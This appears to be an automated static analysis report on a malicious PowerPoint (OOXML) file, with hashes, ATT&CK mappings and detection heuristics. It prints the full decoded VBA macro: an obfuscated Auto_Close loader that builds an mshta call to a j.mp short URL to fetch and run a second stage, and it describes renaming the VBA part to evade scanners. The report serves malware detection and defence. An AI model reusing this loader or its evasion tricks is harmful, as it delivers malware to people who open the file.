Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 98e79d776f8add7f…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 8.2 KB
First seen: 2021-06-04
MD5: cc6bf097feb1215656d394742337a2d8
SHA-1: de7fbb17ebe45e1c5e0666a9779bd936a4578e1c
SHA-256: 98e79d776f8add7fea7053ad55c473b5b4b6234c29318f7c614b48b4a063fba0
Risk Score: 208

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The OOXML file contains heavily obfuscated VBA macros, including an Auto_Close function designed to execute automatically. The script reconstructs a URL, "https://j.mp/adsfljsdahidfhijdvkddskwij", and uses GetObject and shellexecute to download and run a second-stage payload from it. The renaming of the VBA project part and the obfuscation techniques suggest an attempt to evade detection.

Heuristics (6)

  • VBA project inside OOXML (medium, 5 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros are present, and the project part has been renamed away from vbaProject.bin (ppt/yuiopfghjkl.bin).
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
    = _
    GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
    : MsgBox "Microsoft Office not Installed"
  • VBA project part renamed to evade filename detection (high) OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
    = _
    GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
    : MsgBox "Microsoft Office not Installed"
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro (low) OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script:
    Function _
    Auto_Close _
    () _

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1109 bytes
SHA-256: c8e43c59981e80359304f4755b7dc964cc85d32a31672684985c09bbb710cfa0
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Function _
X _
() _
As _
String
X _
= _
"M"
End _
Function
Function _
Y _
() _
As _
String
Y _
= _
"s"
End _
Function
Function _
Z _
() _
As _
String
Z _
= _
"H"
End _
Function
Function _
D _
() _
As _
String
D _
= _
"T"
End _
Function
Function _
E _
() _
As _
String
E _
= _
"a"
End _
Function
Function _
L _
() _
As _
String
L _
= _
"p"
End _
Function
Function _
K _
() _
As _
String
K _
= _
"j.mp/"
End _
Function
Function _
T() _
As _
String
T _
= _
"adsfljsdahidfhijdvkddskwij"
End _
Function
Function _
F _
() _
As _
String
F _
= _
"H" _
+ _
D _
+ _
D _
+ _
L _
+ _
"://" _
+ _
K _
+ _
T
End _
Function
Function _
calccc _
() _
As _
String
calccc _
= _
X _
+ _
Y _
+ _
Z _
+ _
D _
+ _
E
End _
Function
Function _
Auto_Close _
() _
As _
String
Set _
alsoasld _
= _
GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
: MsgBox "Microsoft Office not Installed"
: alsoasld _
. _
shellexecute _
calccc, F
End Function
Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/yuiopfghjkl.bin | 18432 bytes
SHA-256: 432943052509a7be2ba31310db1893c36b3ad9d6cd143e2945b42df6659affbd